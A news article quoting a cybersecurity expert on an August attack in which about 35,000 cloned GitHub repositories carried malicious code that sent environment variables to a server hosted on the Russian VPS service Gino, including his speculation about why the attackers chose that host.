Anton Kuzmin, head of the CyberART Cyber Threat Prevention Center of Innostage Group, announced that in a recent hacker attack on GitHub, the attackers used the Russian dedicated virtual server (VPS) Gino.
“It is impossible to say exactly about the motives for using the Russian VPS by hackers. But there are several options – either the attackers were attracted by the easy accessibility of this service, or they want to impersonate “Russian” hackers“, – said Kuzmin. The expert stressed that these versions are only an assumption based on experience. The true reasons for using the Gino service are currently unknown to him.
The attack on GitHub became known on the night of August 3-4. As part of the incident, clones of various repositories were uploaded to the developer site, which differed from the originals only in the presence of malicious code.
“The attackers added a specific line to the code, as a result of which malware got into GitHub. When launched, it collects and sends the entire contents of the environment variable to the attacker’s server located on the Russian VPS “Gino”, Kuzmin explained the essence of the attack and the role of Russian infrastructure in it.
Thus, according to the expert, hackers could obtain a lot of different official information, including logins and passwords of companies that used the copies. The incident affected about 35 thousand repositories. How many users managed to connect to false storages is not reported. At the moment, GitHub has reported that all infected clones of legitimate projects have been removed.
